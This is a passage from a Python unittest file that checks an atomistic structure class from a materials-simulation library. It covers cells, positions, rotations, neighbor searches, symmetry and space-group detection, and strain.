self.assertTrue(np.array_equal(basis.positions, [[2.5, 2.5, 2.5]]))
def test_set_scaled_positions(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2)
basis.set_scaled_positions(np.array([[0.5, 0.5, 0.5]]))
self.assertTrue(np.array_equal(basis.get_scaled_positions(), [[0.5, 0.5, 0.5]]))
self.assertTrue(
np.array_equal(basis.positions, np.dot([[0.5, 0.5, 0.5]], basis.cell))
)
with warnings.catch_warnings(record=True):
basis.scaled_positions = np.array([[0.5, 0.5, 0.5]])
self.assertTrue(np.array_equal(basis.scaled_positions, [[0.5, 0.5, 0.5]]))
def test_cell(self):
CO = Atoms(
"CO",
positions=[[0, 0, 0], [0, 0, 2]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]],
pbc=[True, True, True],
)
self.assertTrue((CO.get_cell() == np.identity(3)).all())
self.assertTrue((CO.cell == np.identity(3)).all())
cell = CO.cell.copy()
cell[2][2] = 10.0
CO.set_cell(cell)
self.assertEqual(CO.cell[2, 2], 10.0)
self.assertAlmostEqual(CO.get_volume(), 10)
self.assertAlmostEqual(CO.get_volume(per_atom=True), 0.5 * 10)
CO.set_cell(-np.eye(3))
with self.assertRaises(ValueError):
CO.set_cell([2, 1])
dx = 1.0
r_o = [0, 0, 0]
r_h1 = [dx, 0, 0]
r_h2 = [0, dx, 0]
water = Atoms(elements=['H', 'H', 'O'], positions=[r_h1, r_h2, r_o])
self.assertEqual(water.center_coordinates_in_unit_cell(), water)
water.set_cell(np.zeros((3, 3)))
self.assertTrue(np.array_equal(water.cell, np.zeros((3, 3))))
self.assertTrue(np.array_equal(water.get_scaled_positions(), water.positions))
self.assertEqual(water.center_coordinates_in_unit_cell(), water)
def test_add(self):
COX = self.C2 + Atom("O", position=[0, 0, -2])
COX += Atom("O", position=[0, 0, -4])
COX += COX
n_objects = len(set(COX.get_species_objects()))
n_species = len(set(COX.get_chemical_elements()))
self.assertEqual(n_objects, n_species)
def test_pbc(self):
CO = Atoms(
"CO",
positions=[[0, 0, 0], [0, 0, 2]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]],
pbc=[True, True, True],
)
self.assertTrue((CO.pbc == np.array([True, True, True])).all())
CO.set_pbc((True, True, False))
def test_get_masses_DOF(self):
self.assertEqual(
len(self.CO2.get_masses_dof()), len(self.CO2.positions.flatten())
)
def test_get_center_of_mass(self):
basis = Atoms(
elements="AlFe", positions=[3 * [0.5], 3 * [1.5]], cell=2 * np.eye(3)
)
mass = np.array(basis.get_masses())
self.assertAlmostEqual(
(mass[0] * 0.5 + mass[1] * 1.5) / mass.sum(), basis.get_center_of_mass()[0]
)
basis.set_repeat(2)
self.assertAlmostEqual(
(mass[0] * 0.5 + mass[1] * 1.5) / mass.sum() + 1,
basis.get_center_of_mass()[0],
)
def test_rotate(self):
unitcell = Atoms(
elements="AlFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
basis = unitcell.copy()
basis.rotate(a=10.0, v=[0, 0, 0.1 * np.pi])
self.assertAlmostEqual(np.arccos(basis.positions[1, :2].sum() / 2) * 180 / np.pi, 10.0)
basis = unitcell.copy()
basis.rotate(v=[0, 0, 1], a=0.1)
self.assertAlmostEqual(np.arccos(basis.positions[1, :2].sum() / 2) * 180 / np.pi, 0.1)
basis = unitcell.copy()
center_of_mass = basis.get_center_of_mass()
basis.rotate(v=[0, 0, 0.1 * np.pi], center="com")
self.assertTrue(np.allclose(basis.get_center_of_mass(), center_of_mass))
basis = unitcell.copy()
center_of_positions = basis.positions.mean(axis=0)
basis.rotate(v=[0, 0, 1], center="cop")
self.assertTrue(np.allclose(center_of_positions, basis.positions.mean(axis=0)))
basis = unitcell.copy()
position = basis.positions[1]
basis.rotate(v=[0, 0, 1], center="cou")
self.assertTrue(np.allclose(position, basis.positions[1]))
basis = unitcell.copy()
basis.rotate(v=np.random.random(3), rotate_cell=True)
self.assertAlmostEqual(basis.get_scaled_positions()[1, 0], 0.5)
basis = unitcell.copy()
basis.rotate(v=np.random.random(3), index_list=[0])
self.assertTrue(
np.allclose(unitcell.positions.flatten(), basis.positions.flatten())
)
def test_rotate_euler(self):
unitcell = Atoms(
elements="AlFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3)
)
basis = unitcell.copy()
basis.rotate_euler(phi=0.1 * np.pi)
self.assertAlmostEqual(np.arccos(basis.positions[1, :2].sum() / 2) / np.pi, 0.1)
basis = unitcell.copy()
center_of_mass = basis.get_center_of_mass()
basis.rotate_euler(phi=0.1 * np.pi, center="com")
self.assertTrue(np.allclose(basis.get_center_of_mass(), center_of_mass))
basis = unitcell.copy()
center_of_positions = basis.positions.mean(axis=0)
basis.rotate_euler(phi=0.1 * np.pi, center="cop")
self.assertTrue(np.allclose(center_of_positions, basis.positions.mean(axis=0)))
basis = unitcell.copy()
position = basis.positions[1]
basis.rotate_euler(phi=0.1 * np.pi, center="cou")
self.assertTrue(np.allclose(position, basis.positions[1]))
def test_set_initial_magnetic_moments(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2, pbc=True)
basis *= 2
basis.set_initial_magnetic_moments(magmoms=np.ones(len(basis)))
basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2, pbc=True)
basis.set_initial_magnetic_moments(magmoms=np.ones((len(basis), 3)))
basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2, pbc=True)
basis *= 2
basis.set_initial_magnetic_moments(magmoms=np.ones(len(basis)))
self.assertTrue(np.allclose(basis.arrays["initial_magmoms"], np.ones(len(basis))))
# set new magnetic moments with different shape
basis.set_initial_magnetic_moments(magmoms=np.ones((len(basis), 3)))
self.assertTrue(np.allclose(basis.arrays["initial_magmoms"], np.ones((len(basis), 3))))
with self.assertRaises(ValueError):
basis.set_initial_magnetic_moments(magmoms=np.ones(4))
def test_get_parent_basis(self):
periodic_table = PeriodicTable()
periodic_table.add_element(parent_element="O", new_element="O_up")
O_up = periodic_table.element("O_up")
O_basis = Atoms(
[O_up], cell=10.0 * np.eye(3), scaled_positions=[[0.5, 0.5, 0.5]]
)
O_simple = Atoms(
["O"], cell=10.0 * np.eye(3), scaled_positions=[[0.5, 0.5, 0.5]]
)
O_parent = O_basis.get_parent_basis()
self.assertNotEqual(O_basis, O_parent)
self.assertEqual(O_simple, O_parent)
self.assertEqual(O_parent[0].symbol, "O")
periodic_table.add_element(parent_element="O", new_element="O_down")
O_down = periodic_table.element("O_down")
O_basis = Atoms(
[O_up, O_down],
cell=10.0 * np.eye(3),
scaled_positions=[[0, 0, 0], [0.5, 0.5, 0.5]],
)
O_simple = Atoms(
["O", "O"], cell=10.0 * np.eye(3), scaled_positions=[[0., 0., 0.], [0.5, 0.5, 0.5]]
)
O_parent = O_basis.get_parent_basis()
self.assertNotEqual(O_basis, O_parent)
self.assertEqual(O_simple, O_parent)
self.assertEqual(O_parent.get_chemical_formula(), "O2")
self.assertEqual(len(O_basis.species), 2)
self.assertEqual(len(O_simple.species), 1)
self.assertEqual(len(O_parent.species), 1)
def test_profiling(self):
num = 1000
C100 = Atoms(num * ["C"], positions=[(0, 0, 0) for _ in range(num)])
self.assertEqual(len(C100), num)
def test_Au(self):
a = 4.05 # Gold lattice constant
b = a / 2.0
fcc = Atoms(["Au"], cell=[(0, b, b), (b, 0, b), (b, b, 0)], pbc=True)
# print fcc
# print "volume: ", fcc.get_volume()
def test_set_absolute(self):
a = 4.05 # Gold lattice constant
b = a / 2.0
positions = np.array([(0.5, 0.4, 0.0)])
fcc = Atoms(
symbols=["Au"],
scaled_positions=positions,
cell=[(0, b, b), (b, 0, b), (b, b, 0)],
pbc=True,
)
# fcc.set_absolute()
# print fcc.positions
# fcc.set_relative()
self.assertTrue(np.linalg.norm(fcc.get_scaled_positions() - positions) < 1e-10)
def test_set_relative(self):
lattice = CrystalStructure(
element="Al", bravais_basis="fcc", lattice_constants=4
)
basis_relative = lattice.copy()
cell = basis_relative.cell.copy()
cell[0, 0] = 6
basis_relative.set_cell(cell, True)
basis_absolute = lattice.copy()
cell = basis_absolute.cell.copy()
cell[0, 0] = 6
basis_absolute.set_cell(cell)
self.assertAlmostEqual(
basis_relative.positions[-1, 0] * 1.5, basis_absolute.positions[-1, 0]
)
basis = lattice.copy()
self.assertAlmostEqual(
basis.get_scaled_positions(wrap=False)[-1, 0],
basis_relative.get_scaled_positions(wrap=False)[-1, 0],
)
cell = basis.cell.copy()
cell[0, 0] = 6
basis.set_cell(cell)
self.assertAlmostEqual(basis.positions[-1, 0], basis_absolute.positions[-1, 0])
basis = lattice.copy()
basis_relative = lattice.copy()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
basis_relative.set_relative()
self.assertEqual(len(w), 1)
self.assertIsInstance(w[-1].message, DeprecationWarning)
basis.positions[-1, 0] = 0.5
basis_relative.positions[-1, 0] = 0.5
self.assertAlmostEqual(basis.positions[-1, 0], basis_relative.positions[-1, 0])
basis.set_cell(3 * np.ones(3))
self.assertAlmostEqual(basis.get_volume(), 27)
basis.set_cell(np.append(np.ones(3), 90 - np.random.random(3)).flatten())
self.assertLess(basis.get_volume(), 1)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
basis_absolute.set_absolute()
self.assertEqual(len(w), 1)
self.assertIsInstance(w[-1].message, DeprecationWarning)
def test_repeat(self):
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
basis_O.set_scaled_positions(basis_O.get_scaled_positions() + [0.0, 0.0, 0.5])
with self.assertRaises(ValueError):
basis_O.set_repeat(5.0)
with self.assertRaises(AssertionError):
basis_O.set_repeat([2, 2])
basis = basis_Mg + basis_O
basis.center_coordinates_in_unit_cell()
basis.add_tag(selective_dynamics=[True, True, True])
basis.selective_dynamics[basis.select_index("O")] = [False, False, False]
len_before = len(basis)
sel_dyn_before = np.array(basis.selective_dynamics.list())
self.assertTrue(
np.alltrue(
np.logical_not(
np.alltrue(sel_dyn_before[basis.select_index("O")], axis=1)
)
)
)
self.assertTrue(
np.alltrue(np.alltrue(sel_dyn_before[basis.select_index("Mg")], axis=1))
)
basis.set_repeat([3, 3, 2])
sel_dyn_after = np.array(basis.selective_dynamics.list())
len_after = len(basis)
self.assertEqual(basis.get_spacegroup()["Number"], 225)
self.assertEqual(len_before * 18, len_after)
self.assertEqual(len(sel_dyn_before) * 18, len(sel_dyn_after))
self.assertTrue(
np.alltrue(
np.logical_not(
np.alltrue(sel_dyn_after[basis.select_index("O")], axis=1)
)
)
)
self.assertTrue(
np.alltrue(np.alltrue(sel_dyn_after[basis.select_index("Mg")], axis=1))
)
basis = basis_Mg + basis_O
basis.add_tag(spin=None)
basis.spin[basis.select_index("Mg")] = 1
basis.spin[basis.select_index("O")] = -1
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
basis.set_repeat(2)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
basis = basis_Mg + basis_O
basis.add_tag(spin=None)
# Indices set as int
Mg_indices = np.array(basis.select_index("Mg"), dtype=int).tolist()
for ind in Mg_indices:
basis.spin[ind] = 1
O_indices = np.array(basis.select_index("O"), dtype=int).tolist()
for ind in O_indices:
basis.spin[ind] = -1
basis.set_repeat(2)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
# Indices set as numpy.int
Mg_indices = np.array(basis.select_index("Mg"), dtype=np.int)
for ind in Mg_indices:
basis.spin[ind] = 1
O_indices = np.array(basis.select_index("O"), dtype=np.int)
for ind in O_indices:
basis.spin[ind] = -1
basis.set_repeat(2)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
self.assertEqual(8 * len(self.CO2), len(self.CO2.repeat(np.int64(2))))
def test_get_distance(self):
cell = 2.2 * np.identity(3)
NaCl = Atoms("NaCl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
self.assertAlmostEqual(NaCl.get_distance(0, 1), 2.2 * 0.5 * np.sqrt(3))
self.assertAlmostEqual(NaCl.get_distance(0, [0, 0, 0.5]), 0.5)
self.assertAlmostEqual(NaCl.get_distance([0, 0, 0], [0, 0, 0.5]), 0.5)
def test_find_neighbors_by_vector(self):
basis = Atoms(symbols=2*["Fe"],
scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)],
cell=np.identity(3),
pbc=True)
id_lst = basis.find_neighbors_by_vector([0, 0, 1],
num_neighbors=14)
self.assertEqual(len(np.unique(np.unique(id_lst, return_counts=True)[1])), 1)
def test_get_neighborhood(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3), pbc=True
)
neigh = basis.get_neighborhood([0, 0, 0.1])
self.assertEqual(neigh.distances[0], 0.1)
def test_get_neighbors(self):
basis = Atoms(symbols="FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
neigh = basis.get_neighbors(num_neighbors=58)
self.assertAlmostEqual(neigh.distances[0][0], np.sqrt(3))
counts = np.unique(neigh.shells[0], return_counts=True)
self.assertTrue(np.array_equal(counts[0], np.arange(5)+1))
self.assertTrue(np.array_equal(counts[1], np.array([ 8, 6, 12, 24, 8])))
basis = Atoms(symbols="FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
basis.pbc = np.array([True, False, False])
neigh = basis.get_neighbors(num_neighbors=10)
self.assertAlmostEqual(neigh.distances[0][0], np.sqrt(3))
self.assertAlmostEqual(neigh.distances[0][2], 2)
self.assertAlmostEqual(neigh.distances[0][4], np.sqrt(11))
self.assertAlmostEqual(neigh.distances[0][6], 4)
self.assertAlmostEqual(neigh.distances[0][8], np.sqrt(27))
basis.pbc = True
basis.set_repeat(2)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
neigh = basis.get_neighbors(width_buffer=0.1)
self.assertGreaterEqual(len(w), 1)
with self.assertRaises(ValueError):
neigh = basis.get_neighbors(width_buffer=0.001, num_neighbors=100)
basis = Atoms(symbols="FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3))
neigh = basis.get_neighbors(num_neighbors=1)
def test_get_neighbors_by_distance(self):
basis = Atoms(symbols="FeFeFe", positions=[3 * [0], 3 * [1], [0, 0, 1]], cell=2 * np.eye(3), pbc=True)
neigh = basis.get_neighbors_by_distance(1.5)
self.assertEqual(len(neigh.distances[0]), 2)
self.assertEqual(len(neigh.distances[1]), 4)
self.assertEqual(len(neigh.distances[2]), 6)
self.assertEqual(neigh.distances[0][0], 1.)
self.assertAlmostEqual(neigh.distances[1][0], np.sqrt(2))
self.assertEqual(neigh.distances[2][0], 1.)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
neigh = basis.get_neighbors_by_distance(cutoff_radius=1.5, num_neighbors=5)
self.assertGreaterEqual(len(w), 1)
self.assertEqual(len(neigh.distances[2]), 5)
with self.assertRaises(ValueError):
basis.get_neighbors_by_distance(width_buffer=-1)
# Check with large cell with few atoms
dx = 0.7
r_O = [0, 0, 0]
r_H1 = [dx, dx, 0]
r_H2 = [-dx, dx, 0]
unit_cell = 10 * np.eye(3)
water = Atoms(elements=['H', 'H', 'O'], positions=[r_H1, r_H2, r_O], cell=unit_cell, pbc=True)
self.assertIsInstance(water.get_neighbors_by_distance(1.3).indices, list)
water_new = water[[0, 1]]
self.assertTrue(np.array_equal(water_new.get_neighbors_by_distance(1.3).indices, [np.array([]), np.array([])]))
def test_get_number_of_neighbors_in_sphere(self):
basis = Atoms(symbols="FeFeFe", positions=[3 * [0], 3 * [1], [0, 0, 1]], cell=2 * np.eye(3), pbc=True)
num_neighbors_per_atom = basis.get_numbers_of_neighbors_in_sphere(cutoff_radius=2,
width_buffer=0)
self.assertEqual(num_neighbors_per_atom[0], 10)
self.assertEqual(num_neighbors_per_atom[1], 12)
self.assertEqual(num_neighbors_per_atom[2], 6)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
num_neighbors_per_atom = basis.get_numbers_of_neighbors_in_sphere(cutoff_radius=1.5, num_neighbors=5)
self.assertGreaterEqual(len(w), 1)
self.assertEqual(num_neighbors_per_atom[2], 5)
with self.assertRaises(ValueError):
basis.get_numbers_of_neighbors_in_sphere(width_buffer=-1)
def test_get_shell_matrix(self):
structure = CrystalStructure(elements='Fe', lattice_constants=2.83, bravais_basis='bcc')
shell_mat_atoms = structure.get_shell_matrix(num_neighbors=8)
neigh = structure.get_neighbors(num_neighbors=8)
self.assertEqual(shell_mat_atoms[0].sum(), neigh.get_shell_matrix()[0].sum())
def test_center_coordinates(self):
cell = 2.2 * np.identity(3)
NaCl = Atoms("NaCl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
NaCl.set_repeat([3, 3, 3])
NaCl.positions += [2.2, 2.2, 2.2]
NaCl.center_coordinates_in_unit_cell(origin=-0.5)
self.assertTrue(-0.5 <= np.min(NaCl.get_scaled_positions()))
self.assertTrue(np.max(NaCl.get_scaled_positions() < 0.5))
NaCl.center_coordinates_in_unit_cell(origin=0.0)
self.assertTrue(0 <= np.min(NaCl.positions))
self.assertTrue(np.max(NaCl.get_scaled_positions() < 1))
@unittest.skip("skip ovito because it is not installed in the test environment")
def test_analyse_ovito_cna_adaptive(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
basis.analyse_ovito_cna_adaptive()["CommonNeighborAnalysis.counts.BCC"] == 2
@unittest.skip("skip ovito because it is not installed in the test environment")
def test_analyse_ovito_centro_symmetry(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
self.assertTrue(
all(basis.analyse_ovito_centro_symmetry() == np.array([0.75, 0.75]))
)
@unittest.skip("skip ovito because it is not installed in the test environment")
def test_analyse_ovito_voronoi_volume(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
self.assertTrue(
all(basis.analyse_ovito_centro_symmetry() == np.array([0.5, 0.5]))
)
@unittest.skip("skip nglview because it is not installed in the test environment")
def test_plot3d(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
view = basis.plot3d()
@staticmethod
def test_plot3d_plotly():
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
basis.plot3d(mode='plotly')
def test_group_points_by_symmetry(self):
basis = Atoms("FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3))
self.assertEqual(len(basis.group_points_by_symmetry([3 * [0.5], 3 * [1.5]])), 1)
self.assertEqual(len(basis.group_points_by_symmetry([3 * [0.5], 3 * [1.4]])), 2)
def test_get_equivalent_voronoi_vertices(self):
basis = Atoms("FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
vert = basis.get_equivalent_voronoi_vertices()
self.assertEqual(len(vert), 1)
self.assertGreater(
np.min(np.linalg.norm(vert[0] - basis.positions[0], axis=-1)), 0.5
)
self.assertGreater(
np.min(np.linalg.norm(vert[0] - basis.positions[1], axis=-1)), 0.5
)
def test_find_mic(self):
cell = 0.1*(np.random.random((3,3))-0.5)+np.eye(3)
basis = Atoms("Fe", positions=[3*[0.5]], cell=cell, pbc=True)
v = 2*np.random.random(3)-1
r = np.linalg.inv(cell.T).dot(v)
r -= np.rint(r)
self.assertTrue(np.isclose(
r[0]*cell[0]+r[1]*cell[1]+r[2]*cell[2],
basis.find_mic(v, vectors=True)
).all())
for v in [np.ones(3), np.ones((3,3)), np.ones((3,3,3))]:
self.assertTrue(np.array_equal(basis.find_mic(v).shape, v.shape))
def test_get_distances_array(self):
basis = Atoms("FeFe", positions=[3*[0], 3*[0.9]], cell=np.identity(3), pbc=True)
self.assertAlmostEqual(basis.get_distances_array(mic=False)[0, 1], 0.9*np.sqrt(3))
self.assertTrue(np.allclose(basis.get_distances_array(p1=0.5*np.ones(3)),
basis.get_distances_array(p2=0.5*np.ones(3))))
self.assertTrue(np.allclose(basis.get_distances_array(vectors=True)[0, 1], -0.1*np.ones(3)))
def test_repeat_points(self):
basis = Atoms("Fe", positions=np.random.rand(3).reshape(-1, 3), cell=np.identity(3))
basis.cell[0, 1] = 0.01
with self.assertRaises(ValueError):
basis.repeat_points([0, 0, 0], [2 ,2])
with self.assertRaises(ValueError):
basis.repeat_points([0, 0], 2)
v = np.random.rand(3)
w = basis.repeat_points(v, 3)
v += np.array([1, 0.01, 0])
self.assertAlmostEqual(np.linalg.norm(w-v, axis=-1).min(), 0)
v = np.random.rand(6).reshape(-1, 3)
self.assertEqual(basis.repeat_points(v, 2).shape, (8, 2, 3))
def test_get_extended_positions(self):
basis = Atoms("FeFe", positions=[[0.01, 0, 0], [0.5, 0.5, 0.5]], cell=np.identity(3), pbc=True)
with self.assertRaises(ValueError):
basis.get_extended_positions(-0.1)
self.assertTrue(np.array_equal(basis.get_extended_positions(0), basis.positions))
def test_get_equivalent_points(self):
basis = Atoms("FeFe", positions=[[0.01, 0, 0], [0.5, 0.5, 0.5]], cell=np.identity(3))
arr = basis.get_equivalent_points([0, 0, 0.5])
self.assertAlmostEqual(np.linalg.norm(arr-np.array([0.51, 0.5, 0]), axis=-1).min(), 0)
def test_cluster_analysis(self):
basis = CrystalStructure("Al", bravais_basis="fcc", lattice_constants=4.2).repeat(10)
key, counts = basis.cluster_analysis(id_list=[0,1], return_cluster_sizes=True)
self.assertTrue(np.array_equal(key[1], [0,1]))
self.assertEqual(counts[0], 2)
key, counts = basis.cluster_analysis(id_list=[0,int(len(basis)/2)], return_cluster_sizes=True)
self.assertTrue(np.array_equal(key[1], [0]))
self.assertEqual(counts[0], 1)
def test_get_bonds(self):
basis = CrystalStructure("Al", bravais_basis="fcc", lattice_constants=4.2).repeat(5)
bonds = basis.get_bonds()
neigh = basis.get_neighbors()
self.assertTrue(np.array_equal(np.sort(bonds[0]['Al'][0]),
np.sort(neigh.indices[0, neigh.shells[0]==1])))
def test_get_symmetr(self):
cell = 2.2 * np.identity(3)
Al = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
with self.assertRaises(ValueError):
Al.symmetrize_vectors(1)
v = np.random.rand(6).reshape(-1, 3)
self.assertAlmostEqual(np.linalg.norm(Al.symmetrize_vectors(v)), 0)
Al.positions[0,0] += 0.01
w = Al.symmetrize_vectors(v, force_update=True)
self.assertAlmostEqual(np.absolute(w[:,0]).sum(), np.linalg.norm(w, axis=-1).sum())
def test_get_symmetry(self):
cell = 2.2 * np.identity(3)
Al = Atoms("AlAl", positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell).repeat(2)
self.assertEqual(len(set(Al.get_symmetry()["equivalent_atoms"])), 1)
self.assertEqual(len(Al.get_symmetry()["translations"]), 96)
self.assertEqual(
len(Al.get_symmetry()["translations"]), len(Al.get_symmetry()["rotations"])
)
def test_get_voronoi_vertices(self):
cell = 2.2 * np.identity(3)
Al = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell, pbc=True)
pos, box = Al._get_voronoi_vertices()
self.assertEqual(len(pos), 14)
def test_get_parent_symbols(self):
self.assertTrue(np.array_equal(self.CO2.get_parent_symbols(), ["C", "O", "O"]))
self.assertTrue(
np.array_equal(
self.CO2.get_parent_symbols(), self.CO2.get_chemical_symbols()
)
)
cell = np.eye(3) * 10.0
pse = PeriodicTable()
pse.add_element("O", "O_up", spin="up")
o_up = pse.element("O_up")
basis = Atoms([o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=cell)
self.assertTrue(np.array_equal(basis.get_parent_symbols(), ["O"]))
self.assertFalse(
np.array_equal(basis.get_parent_symbols(), basis.get_chemical_symbols())
)
def test_get_chemical_symbols(self):
self.assertTrue(
np.array_equal(self.CO2.get_chemical_symbols(), ["C", "O", "O"])
)
cell = np.eye(3) * 10.0
pse = PeriodicTable()
pse.add_element("O", "O_up", spin="up")
o_up = pse.element("O_up")
basis = Atoms([o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=cell)
self.assertTrue(np.array_equal(basis.get_chemical_symbols(), ["O_up"]))
def test_get_symmetry_dataset(self):
cell = 2.2 * np.identity(3)
Al_sc = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
Al_sc.set_repeat([2, 2, 2])
self.assertEqual(Al_sc.get_symmetry_dataset()["number"], 229)
def test_get_space_group(self):
cell = 2.2 * np.identity(3)
Al_sc = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
self.assertEqual(Al_sc.get_spacegroup()["InternationalTableSymbol"], "Im-3m")
self.assertEqual(Al_sc.get_spacegroup()["Number"], 229)
cell = 4.2 * (0.5 * np.ones((3, 3)) - 0.5 * np.eye(3))
Al_fcc = Atoms("Al", scaled_positions=[(0, 0, 0)], cell=cell)
self.assertEqual(Al_fcc.get_spacegroup()["InternationalTableSymbol"], "Fm-3m")
self.assertEqual(Al_fcc.get_spacegroup()["Number"], 225)
a = 3.18
c = 1.623 * a
cell = np.eye(3)
cell[0, 0] = a
cell[2, 2] = c
cell[1, 0] = -a / 2.0
cell[1, 1] = np.sqrt(3) * a / 2.0
pos = np.array([[0.0, 0.0, 0.0], [1.0 / 3.0, 2.0 / 3.0, 1.0 / 2.0]])
Mg_hcp = Atoms("Mg2", scaled_positions=pos, cell=cell)
self.assertEqual(Mg_hcp.get_spacegroup()["Number"], 194)
cell = np.eye(3)
cell[0, 0] = a
cell[2, 2] = c
cell[1, 1] = np.sqrt(3) * a
pos = np.array(
[
[0.0, 0.0, 0.0],
[0.5, 0.5, 0.0],
[0.5, 0.16666667, 0.5],
[0.0, 0.66666667, 0.5],
]
)
Mg_hcp = Atoms("Mg4", scaled_positions=pos, cell=cell)
self.assertEqual(Mg_hcp.get_spacegroup()["Number"], 194)
def test_get_primitive_cell(self):
cell = 2.2 * np.identity(3)
Al_sc = Atoms("AlFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
Al_sc.set_repeat([2, 2, 2])
primitive_cell = Al_sc.get_primitive_cell()
self.assertEqual(primitive_cell.get_spacegroup()["Number"], 221)
def test_get_ir_reciprocal_mesh(self):
cell = 2.2 * np.identity(3)
Al_sc = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
self.assertEqual(len(Al_sc.get_ir_reciprocal_mesh([3, 3, 3])[0]), 27)
def test_get_number_species_atoms(self):
self.assertEqual(list(self.CO2.get_number_species_atoms().values()), [1, 2])
def test_get_chemical_formula(self):
self.assertEqual(self.CO2.get_chemical_formula(), "CO2")
def test_get_equivalent_atoms(self):
cell = 2.2 * np.identity(3)
Al_sc = Atoms("AlFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
Al_sc.set_repeat([2, 2, 2])
def test_center(self):
old_pos = self.CO2.positions.copy()
self.CO2.center(vacuum=5)
new_array = old_pos + 5 * np.ones(3)
self.assertTrue(np.array_equal(self.CO2.positions, new_array))
def test_get_positions(self):
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constants=4.2)
self.assertTrue(np.array_equal(basis_Mg.positions, basis_Mg.get_positions()))
def test_get_scaled_positions(self):
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constants=4.2)
basis_Mg.set_cell(basis_Mg.cell+0.1 * np.random.random((3, 3)))
basis_Mg = basis_Mg.center_coordinates_in_unit_cell()
self.assertTrue(
np.allclose(
np.dot(np.linalg.inv(basis_Mg.cell).T, basis_Mg.positions.T).T,
basis_Mg.get_scaled_positions(),
)
)
def test_apply_strain(self):
basis_Fe = CrystalStructure("Fe", bravais_basis="bcc", lattice_constants=2.85)
with self.assertRaises(ValueError):
basis_Fe.apply_strain(-2)
basis_new = basis_Fe.apply_strain(0.01, return_box=True)
self.assertAlmostEqual(basis_new.cell[0,0], 2.85*1.01)
self.assertAlmostEqual(basis_new.positions[1,0], 0.5*2.85*1.01)
self.assertAlmostEqual(basis_Fe.cell[0, 0], 2.85)
basis_Fe.apply_strain(0.01)
self.assertAlmostEqual(basis_Fe.cell[0,0], 2.85*1.01)
basis_Fe = CrystalStructure("Fe", bravais_basis="bcc", lattice_constants=2.85)
basis_Fe.apply_strain(0.01*np.eye(3))
self.assertAlmostEqual(basis_Fe.cell[0,0], 2.85*1.01)
def test_get_spherical_coordinates(self):
basis_Fe = CrystalStructure("Fe", bravais_basis="bcc", lattice_constants=2.85)
x = basis_Fe.get_spherical_coordinates([0, 0, 0])
self.assertAlmostEqual(x[0, 0], 0)
